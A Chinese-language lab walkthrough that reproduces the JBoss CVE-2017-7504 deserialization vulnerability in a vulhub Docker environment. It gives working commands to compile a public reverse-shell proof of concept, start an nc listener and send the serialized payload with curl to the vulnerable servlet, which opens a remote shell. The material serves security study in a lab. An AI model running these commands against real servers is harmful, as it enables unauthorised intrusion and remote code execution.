CVE-2017-7504 JBOSS反序列化漏洞复现

一、漏洞描述

  JBoss AS 4.x及之前版本中，JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞，远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

二、漏洞环境搭建

需要使用的工具如下

1.docker+vulhub漏洞库
2.漏洞POC：下载链接https://github.com/joaomatosf/JavaDeserH2HC
3.攻击机kali虚拟机（版本随意）
4.靶机Ubuntu18.04虚拟机（其他也可以）

打开Ubuntu虚拟机，有docker环境和vulhub漏洞库的话就直接进入环境，没有的话先安装docker和下载vulhub漏洞库（网上教程很多，这里就不多介绍了）

root@admin666-virtual-machine:~/vulhub-master/jboss/CVE-2017-7504# 

执行命令

root@admin666-virtual-machine:~/vulhub-master/jboss/CVE-2017-7504# docker-compose up -d

等到出现以下页面说明已经搭建完成

可以访问http://your-ip:8080，出现如下页面证明环境搭建成功！

三、漏洞利用

进入kali利用漏洞POC进行验证

1、先把POC克隆到kali中，执行命令

git clone https://github.com/joaomatosf/JavaDeserH2HC

2、进入JavaDeserH2HC目录，执行

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

3、设置接收shell的IP和端口

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 攻击机IP:监听端口

4、使用nc监听端口

nc -lvvp 监听端口

5、用攻击机发送payload，在JavaDeserH2HC目录下执行

curl http://192.168.1.17:8080/jbossmq-httpil/HTTPServerILServlet  --data-binary @ReverseShellCommonsCollectionsHashMap.ser

6、查看监听端口返回的shell，可以执行命令，至此漏洞验证完成

7、关闭docker环境

docker-compose down